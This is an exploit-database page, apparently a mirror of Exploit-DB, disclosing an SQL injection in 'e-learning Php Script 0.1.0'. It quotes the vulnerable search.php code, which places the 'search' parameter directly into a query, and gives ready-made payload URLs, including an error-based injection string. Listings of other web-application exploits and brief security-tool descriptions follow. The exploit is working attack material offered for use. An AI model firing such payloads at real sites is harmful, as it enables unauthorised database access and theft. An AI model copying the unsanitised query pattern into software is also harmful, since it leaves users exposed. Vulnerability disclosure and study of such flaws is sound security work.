Search for hundreds of thousands of exploits

"e-learning Php Script 0.1.0 - 'search' SQL Injection"

Author

Exploit author

KeopssGroup0day_Inc

Platform

Exploit platform

php

Release date

Exploit published date

2020-07-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script
# Version: 0.1.0
# Tested on: Kali Linux

Source code(search.php):
                     <?php
                     if(isset($_GET['search_submit'])){
                     $search_key = $_GET['search'];
                     $search = "select * from posts where post_keywords 
like '%$search_key%'";
                     $run_search = mysqli_query($con,$search);
                     $count = mysqli_num_rows($run_search);
                     if($count == 0){
                     echo "<h2>No Result Found.Please Try With Another 
Keywords.</h2>";
                     }else{
                     while($search_row = 
mysqli_fetch_array($run_search)):
                     $post_id = $search_row ['post_id'];
                     $post_title = $search_row ['post_title'];
                     $post_date = $search_row ['post_date'];
                     $post_author = $search_row ['post_author'];
                     $post_featured_image = $search_row ['post_image'];
                     $post_keywords = $search_row ['post_keywords'];
                     $post_content = substr($search_row 
['post_content'],0,200);
                     ?>

Payload:
         http://127.0.0.1/e/search.php?search=a&search_submit=Search
         http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 
FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT 
(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search
Release DateTitleTypePlatformAuthor
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
2020-09-03"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)"webappsphpV1n1v131r4
Release DateTitleTypePlatformAuthor
2020-07-15"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-15"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass"webappsphpKeopssGroup0day_Inc
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48629/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.